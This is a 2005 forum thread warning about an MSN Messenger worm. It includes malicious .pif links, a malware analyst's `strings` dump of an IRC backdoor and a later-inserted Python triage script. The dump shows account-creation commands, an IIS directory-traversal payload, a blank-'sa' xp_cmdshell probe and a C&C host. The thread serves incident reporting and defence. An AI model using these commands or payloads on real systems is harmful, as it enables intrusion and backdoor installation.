
Thread: News: MSN Virus - Do not click on link.

  1. #1 s0nIc (Fastest Thing Alive)

    News: MSN Virus - Do not click on link.

    Hot and fresh off the kitchen....

    When someone on msn sends u this link

    http://home.earthlink.net/~gallery10/omg.jpg

    do not accept it.

    coz once u accept it, its actually

    http://home.earthlink.net/~gallery10/omg.pif

    i have yet to look around what it does, i will update it if it's a hoax or not. but for now, avoid that link. I have just received a msg on MSN with the same said link by an old friend. she went offline after the msg was sent. Which explains why my friend went offline after sending me the link. Similar cases were told to me by other people i know over MSN and IRC.

    I've had someone on IRC just tell me about it recently. he also received the msg from someone.


    UPDATE: 10 mins past

    So far, all I've dug up in the past few mins is there have been several similar cases in the past few weeks and just today: .pif masked as a .jpg and being passed around as links...

    Apparently it doesn't only do .pif, it also does .exe, .bat and .vbs as well.

    As far as I've found out, the file automatically sends variations of itself to ur contacts and signs u off automatically...

    it is the Bropia again! it's spreading quick here in Australia. God we're way behind.. we're getting attacked by a worm that existed a month ago...

    This is apparently same case.. just different links.

    Source: http://www.computerworld.com/securit...,99524,00.html
    Source: http://www.gmailforums.com/lofiversi...php/t8546.html

    I'll find more..

    Fix: http://securityresponse.symantec.com...oval.tool.html

  2. #2

    Bropha.K

    On the blog from F-Secure, their latest post mentions a new version of this one, called Bropha.K that came out Sunday.
    The link to their blog for a little more info is here.

  3. #3 thehorse13 (Moderator)
    This is what I have:

    Early AM, EST, information came about an MSN messenger worm that spread by
    sending the following message: "http://home.earthlink.net/~gallery10/omg.pif lol! see it! u'll like it"

    I would estimate millions got infected.

    Once going to that page, the Trojan horse was downloaded onto your PC,
    and in turn it downloaded three other Trojan horses, also hosted at
    Earthlink.

    One of them then proceeded to connect to a botnet command and control
    IRC server.

    Due to international cooperation between ISPs, AV companies and CERTs
    on a secure and vetted drone armies and malicious web sites coordination
    group (yes, I am a member of this group), all the sites and the C&C IRC server were killed by their
    authoritative owner.

    Taking the sites down effectively stopped the spread of the worm, and
    killing the C&C assured that the infected users won't be later used as a
    group for illegal purposes such as DDoS, spam, etc. We go into action
    when worms go out.

    This was done in a very short time, and while there were no signatures
    yet for this worm from AV companies.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4 Senior Member
    Same here (in the uk), but with the format of

    omg this is funny! http://jose.rivera4.home.att.net/cute.pif

    ---- DON'T CLICK IT
    -

  5. #5 Junior Member
    Got it with another message and link:
    Again in the UK

    "haha look at us"
    "http://designoflife.net/youandme.pif"
    I have plenty of thought and talent. I just don't give a damn

  6. #6 Senior Member
    Yeah, I (err, actually, my sister) got the same one as mikester2 at around 16:30 UTC-5 yesterday, but had the brilliant idea of opening it... :rolleyes:

    Now, it installed a bunch of adware that was rather easily removed, but left two running processes:
    hotkeysvc.exe
    winfrw.exe

    hotkeysvc is cited in the symantec and other AV vendors writeups...

    winfrw.exe however I haven't seen mentioned anywhere (nor does google turn up anything).
    A quick `strings` on it reveals that it seems to be an IRC botnet trojan/backdoor that amongst other things creates a user and group on the target machine, tries to connect to mssql servers with a blank SA account and then executes a localhost ping with the xp_cmdshell extended stored procedure, contains a unicode encoded /script/../../cmd.exe directory traversal attempt, and such.

    md5 hash of the winfrw.exe file (if anyone wants to compare):
    23eabd0e6a6e5ea6ed1987eb3821c847 *winfrw.exe


    Ok, here's the (interesting parts of the) actual strings output if that interests anyone:
    Code:
    
    ExitProcessExitProcess
    GetModuleHandleA
    GetTickCount
    CloseHandle
    WriteFile
    CreateFileA
    SetFileAttributesA
    CopyFileA
    SetCurrentDirectoryA
    GetWindowsDirectoryA
    GetModuleFileNameA
    CreateThread
    GetLastError
    CreateMutexA
    lstrlenA
    lstrcmpA
    GetFileAttributesA
    GetVersionExA
    GetSystemInfo
    GlobalMemoryStatus
    DeleteFileA
    Sleep
    ReadFile
    GetFileSize
    lstrcmpiA
    TerminateProcess
    OpenProcess
    FindClose
    FindNextFileA
    FindFirstFileA
    KERNEL32.dll
    DispatchMessageA
    TranslateMessage
    GetMessageA
    ShowWindow
    CreateWindowExA
    RegisterClassExA
    LoadCursorA
    LoadIconA
    GetDesktopWindow
    DefWindowProcA
    SetWindowsHookExA
    SetKeyboardState
    SetTimer
    MoveWindow
    wsprintfA
    GetWindowTextA
    GetForegroundWindow
    UnhookWindowsHookEx
    PostQuitMessage
    CloseWindow
    CallNextHookEx
    ToAscii
    GetKeyboardState
    GetKeyNameTextA
    GetActiveWindow
    DestroyWindow
    SendMessageA
    IsWindow
    USER32.dll
    DeleteObject
    GetDIBColorTable
    BitBlt
    SelectObject
    CreateDIBSection
    DeleteDC
    CreateCompatibleDC
    GetDeviceCaps
    CreateDCA
    GDI32.dll
    RegCloseKey
    RegSetValueExA
    RegCreateKeyExA
    ADVAPI32.dll
    ShellExecuteA
    SHELL32.dll
    ODBC32.dll
    strstr
    strtok
    sprintf
    atol
    atoi
    strncpy
    rand
    srand
    strncat
    free
    malloc
    ??3@YAXPAX@Z
    ??2@YAPAXI@Z
    MSVCRT.dll
    InternetGetConnectedState
    WININET.dll
    WS2_32.dll
    capGetDriverDescriptionA
    capCreateCaptureWindowA
    AVICAP32.dll
    WNetCloseEnum
    WNetEnumResourceA
    WNetOpenEnumA
    MPR.dll
    GetModuleBaseNameA
    EnumProcesses
    GetModuleFileNameExA
    EnumProcessModules
    PSAPI.DLL
    URLDownloadToFileA
    urlmon.dll
    FBI.USA.GOV
    /scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33
    e%65%78%65?/c+
    SysCfg
    Explorer
    PRIVMSG %s :%s
    hak-
    open
    @echo off
    net user /add System hakt
    net localgroup /add Administrators System
    del %0
    temp.bat
    Windows System Configuration
    \WINFRW.EXE
    USER %s %s %s :%s
    NICK %s
    QUIT :Received WM_ENDSESSION message.
    QUIT :Received WM_QUIT message.
    QUIT :Received WM_QUERYENDSESSION message.
    #komo
    bo.timzoz.net
    88FinalSolution88
    Windows Security Updater
    Software\Microsoft\Windows\CurrentVersion\Run
    QUIT :Received WM_DESTROY message.
    QUIT :Received WM_CLOSE message.
    PONG %s
    PING
    PRIVMSG %s :Version %d.%d (%s). Your mother sucks **** in hell.
    version
    random
    icmp
    PRIVMSG %s :Active window: %s.
    active
    PRIVMSG %s :File not found.
    send
    exec
    PRIVMSG %s :Connected to IRC for: %d day(s), %d hour(s), and %d m
    PRIVMSG %s :System Uptime: %d day(s), %d hour(s), and %d minute(s
    uptime
    PRIVMSG %s :OS: Windows %s. IP: %d.%d.%d.%d. Memory: %d/%dMB. CPU
     processor(s). Uptime: %d day(s), %d hour(s), and %d minute(s).
    %s (%s)
    2000
    sysinfo
    PRIVMSG %s :Error while executing file.
    PRIVMSG %s :File executed.
    PRIVMSG %s :Error while downloading file.
    PRIVMSG %s :File downloaded.
    PRIVMSG %s :Downloading %s to %s...
    klolol
    PRIVMSG %s :Error while capturing amateur video from webcam.
    PRIVMSG %s :Amateur video saved to %s.
    video
    PRIVMSG %s :Error while capturing from webcam.
    PRIVMSG %s :Webcam capture saved to %s.
    frame
    PRIVMSG %s :Capture driver #%d - %s - %s.
    drivers
    PRIVMSG %s :Error while capturing screen.
    PRIVMSG %s :Screen capture saved to %s.
    screen
    capture
    PRIVMSG %s :KeySpy disabled.
    PRIVMSG %s :KeySpy enabled.
    PRIVMSG %s :KeySpy already enabled.
    keyspy
    PRIVMSG %s :Spoof IP set to '%s'.
    PRIVMSG %s :'%s' is an invalid IP address (it's not hard).
    %d.%d.%d.*
    PRIVMSG %s :Spoofing currently set to '%s'.
    PRIVMSG %s :Spoofing disabled.
    spoof
    PRIVMSG %s :Unable to resolve host.
    PRIVMSG %s :Resolved %s to %s.
    PRIVMSG %s :Unable to delete %s.
    PRIVMSG %s :%s has been deleted.
    delete
    pscan
    PRIVMSG %s :Can't resolve IRC server.
    PRIVMSG %s :Connecting clone to %s[:%s].
    PRIVMSG %s :Max clones reached.
    load
    PRIVMSG %s :Clones killed.
    kill
    clone
    PRIVMSG %s :Enable password set to '%s', bot disabled.
    disable
    PRIVMSG %s :Password accepted, commands enabled.
    enable
    PRIVMSG
    PRIVMSG %s :Initializing DCC console...
    CHAT
    PRIVMSG %s :Downloading '%s' through DCC (%d bytes)...
    PRIVMSG %s :CreateFile() failed.
    SEND
    PRIVMSG %s :DCC resume is not supported (yet).
    RESUME
    JOIN %s %d
    PONG %s
    JOIN %s
    Enter
    Backspace
    PRIVMSG %s :
    %d(KeySpy) %s
    (%s)
    PRIVMSG %s :Error sending packets to %s. eax=SOCKET_ERROR, WSAGet
     sizeof(buffer) = %d. Packets sent sucessfully = %d.
    PRIVMSG %s :Finished sending packets to %s. Sent %d packet(s). ~%
    t (~%dK/s).
    %d.%d.%d.%d
    PRIVMSG %s :Sending packets to %s...
    PRIVMSG %s :Invalid target IP.
    PRIVMSG %s :Error calling setsockopt(). WSAGetLastError() returns
    PRIVMSG %s :Error calling socket().
    PRIVMSG %s :You cant send packets for 0 seconds.
    PRIVMSG %s :Received %s (%d bytes).
    PRIVMSG %s :connect() failed.
    PRIVMSG %s :socket() failed.
    PRIVMSG %s :Sent %s to %s. (%d bytes).
    PRIVMSG %s :send() failed.
    PRIVMSG %s :Transfer accepted, sending...
    PRIVMSG %s :accept() failed.
    PRIVMSG %s :DCC send timed out.
    PRIVMSG %s :
    DCC SEND %s %d %d %d
    NOTICE %s :DCC Send %s (%s)
    PRIVMSG %s :Sending file to %s...
    PRIVMSG %s :bind() failed.
    DISPLAY
    Window
    PRIVMSG %s :Unicode vulnerable server on %s.
    HTTP/1.0 200 OK
    HTTP/1.1 200 OK
    GET %sdir HTTP/1.1
    Connection: close
    PRIVMSG %s :SQL server with open 'sa' account on %s.
    xp_cmdshell 'ping 127.0.0.1'
    %s%s%s
    DRIVER={SQL Server};SERVER=
    ;UID=sa;PWD=
    %s.%d
    %s.%d.%d
    PRIVMSG %s :IP range scan complete.
    PRIVMSG %s :Open port found on %s[:%d].
    %s.%d.%d.%d
    PRIVMSG %s :IP range scan started...
    PRIVMSG %s :DCC console closed.
    EnumProcesses() failed.
    Error while killing process.
    Syntax: process kill <pid>.
    Error while enumerating modules.
    Syntax: process modules <pid>.
    Sub-commands of 'process':
      list, kill, modules.
    End of process list.
    %s - %d.
    unknown
    Number of active processes: %d.
    list
    Process terminated.
    End of module list.
    %s (0x%08X)
    Listing modules...
    modules
    process
    End of directory list.
    <%s>
    Listing Directory: %s.
    Error while deleting file.
    File deleted.
    Error while copying file.
    File copied.
    copy
    Sub-commands of 'file':
      dir.
    file
    End of network list.
    enumerate
    Sub-commands of 'network':
      enumerate.
    network
      file, process, network.
    Available commands:
    help
    Welcome to the Wisdom DCC console.
    Current system uptime: %d day(s), %d hour(s) and %d minute(s).
    PRIVMSG %s :DCC console activated.
    
    The process also opens and listens on ports tcp 559 and udp 123, but connecting with netcat on them doesn't return anything (and I can't seem to coax it to return any message by sending it stuff).

    Now AFAIK this does look like a Gaobot or spybot variant (I think), but on virustotal.com, only the following vendors detected it (as of the time of this post):

    This is a report processed by VirusTotal on 03/08/2005 at 01:22:19 (CET) after scanning the file "WINFRW.EXE" file.
    Antivirus Version Update Result
    AntiVir 6.30.0.5 03.07.2005 BDS/Wisdoor.K
    AVG 718 03.07.2005 no virus found
    BitDefender 7.0 03.07.2005 BehavesLike:Win32.IRC-Backdoor
    ClamAV devel-20050130 03.08.2005 Trojan.Wisdoor-6
    DrWeb 4.32b 03.07.2005 no virus found
    eTrust-Iris 7.1.194.0 03.07.2005 no virus found
    eTrust-Vet 11.7.0.0 03.07.2005 no virus found
    Fortinet 2.51 03.08.2005 no virus found
    F-Prot 3.16a 03.07.2005 no virus found
    Ikarus 2.32 03.07.2005 no virus found
    Kaspersky 4.0.2.24 03.08.2005 Backdoor.Win32.Wisdoor.av
    NOD32v2 1.1021 03.07.2005 probably unknown NewHeur_PE virus
    Norman 5.70.10 03.07.2005 no virus found
    Panda 8.02.00 03.07.2005 W32/Gaobot.DLA.worm
    Sybari 7.5.1314 03.08.2005 W32/Sdbot.worm.gen
    Symantec 8.0 03.07.2005 no virus found
    Yesterday only 4 vendors detected it (antivir, clamav, Kaspersky, NOD32v2)

    I also sent the file to symantec (which I use) and isc.sans.org...

    The good news is that the link it was downloaded from was quickly disabled and returned a code 500 around midnight already.


    Ammo
    Credit travels up, blame travels down -- The Boss
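As an added example (not code from this thread or from any of the posters), a small Python triage script that runs the kind of indicator checks Ammo describes over a constructed subset of the posted `strings` output: IRC protocol format strings, local account creation, Run-key persistence, the blank 'sa' connection string, xp_cmdshell, and the overlong-UTF-8 directory traversal, which it also normalises into a readable path. The rule labels are my own, not any vendor's.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: lines copied from the `strings` output posted above,
# plus one benign import name so the rules have something to skip.
SAMPLE_STRINGS = """\
GetModuleHandleA
net user /add System hakt
net localgroup /add Administrators System
Software\\Microsoft\\Windows\\CurrentVersion\\Run
PRIVMSG %s :Spoof IP set to '%s'.
NICK %s
;UID=sa;PWD=
xp_cmdshell 'ping 127.0.0.1'
/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33
"""

# Triage rules (label, regex); labels are my own, mirroring Ammo's findings.
RULES = [
    ("irc-protocol", re.compile(r"^(PRIVMSG|NICK|JOIN|PONG|USER) ")),
    ("local-account-creation", re.compile(r"^net (user|localgroup) /add ")),
    ("run-key-persistence", re.compile(r"CurrentVersion\\Run$")),
    ("blank-sa-login", re.compile(r"UID=sa;PWD=$")),
    ("xp_cmdshell", re.compile(r"xp_cmdshell")),
]

# Overlong UTF-8 forms of '/' and '\' that a lenient decoder accepts as path
# separators after the '..' check has already run (the old IIS Unicode bug).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

def overlong_traversal(s):
    """True if the percent-decoded bytes contain an overlong separator."""
    raw = unquote_to_bytes(s)
    return any(seq in raw for seq in OVERLONG)

def normalise_path(s):
    """Percent-decode and map overlong separators to plain ones for review."""
    raw = unquote_to_bytes(s)
    for seq, plain in OVERLONG.items():
        raw = raw.replace(seq, plain)
    return raw.decode("ascii", errors="replace")

def classify_line(line):
    hits = [label for label, rx in RULES if rx.search(line)]
    if overlong_traversal(line):
        hits.append("overlong-utf8-traversal")
    return hits

def triage(strings_output):
    """Map each triage label to the strings that triggered it."""
    findings = {}
    for line in strings_output.splitlines():
        line = line.strip()
        for label in classify_line(line):
            findings.setdefault(label, []).append(line)
    return findings
```

Run `triage(open("strings.txt").read())` on a real `strings` dump to get the same label-to-lines map; the regexes are deliberately loose and are a starting point for review, not a verdict.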

  7. #7 gore
    Originally posted here by mikester2
    Same here (in the uk), but with the format of

    omg this is funny! [ u rl ] http://jose.rivera4.home.att.net/cute.pif [ / url]

    ---- DON'T CLICK IT
    Perhaps you could edit this message of yours and select NOT to parse URLs?

    " Automatically parse URLs: automatically adds [ url ] and [ /url ] around internet addresses. "

    That one.

    Not that this link can really do a thing to me but someone else could accidentally click on it while scrolling the text and trying to scroll back down or something.

  8. #8 Senior Member
    That link doesn't actually work anymore, it returned a code 500 last night and is now explicitly forbidden (403)... (Although I agree that not parsing it is a good thing)

    Ammo
    Credit travels up, blame travels down -- The Boss

  9. #9 Hoopy Frood
    These look to be variants of the W32.Kelvir virus (also called Bropia as s0nic stated). These are the four variants that Symantec lists.

    http://securityresponse.symantec.com....kelvir.a.html
    http://securityresponse.symantec.com....kelvir.b.html (this one has a S.S.)
    http://securityresponse.symantec.com....kelvir.c.html
    http://securityresponse.symantec.com....kelvir.d.html

    - Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  10. #10 Senior Member
    Ok, I just got a reply from Symantec concerning my file submission: it was assigned the new designation Backdoor.Solufina

    This message is an automatically generated reply. This system is designed to analyze and process virus submissions into the Symantec Security Response and cannot accept correspondence or inquiries.
    Please contact your Technical Support representative if more detailed information about your submission is required. Do not reply to this message.

    Below is a status update on your virus submission:

    Date: March 7, 2005

    <ammo>



    Dear <ammo>,

    We have analyzed your submission. The following is a report of our
    findings for each file you have submitted:

    filename: E:\Users\ammo\forensics\WINFRW.EXE
    machine:
    result: This file is infected with Backdoor.Solufina

    Developer notes:
    E:\Users\ammo\forensics\WINFRW.EXE is a non-repairable threat. Please delete this file and replace it if necessary. Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

    Symantec Security Response has determined that the sample(s) that you provided are infected with a virus, worm, or Trojan. We have created RapidRelease definitions that will detect this threat. Please follow the instruction at the end of this email message to download and install the latest RapidRelease definitions.
    Symantec is now building a new set of definitions to include the threat you have submitted. The approximate time to complete this process is one hour. We recommend checking the ftp site periodically over the next 60 to 90 minutes to download these definitions as soon as they are available.

    Downloading and Installing RapidRelease Definitions:
    1. Open your Web browser. If you are using a dial-up connection, connect to any Web site, such as: http://securityresponse.symantec.com/
    2. Copy and paste the address ftp://ftp.symantec.com/public/englis...ease/sequence/ into the address bar of your Web browser and then press Enter. (This could take a minute or so if you have a slow connection.)
    3. Now select the 41880 folder or a higher one. Open the folder.
    4. Select the file symrapidreleasedefsi32.exe
    5. When a download dialog box appears, save the file to the Windows desktop.
    6. Double-click the downloaded file and follow the prompts.

    ----------------------------------------------------------------------
    This message was generated by Symantec Security Response automation

    Should you have any questions about your submission, please contact
    our regional technical support from the Symantec website
    (http://www.symantec.com/techsupp/)
    and give them the tracking number in the subject of this message.



    --------------------------------------------

    Since it seems to be a new backdoor (or at least variation) I guess I should go double check that the IRC server the binary tries to connect to is informed/shutdown...


    Ammo
    Credit travels up, blame travels down -- The Boss
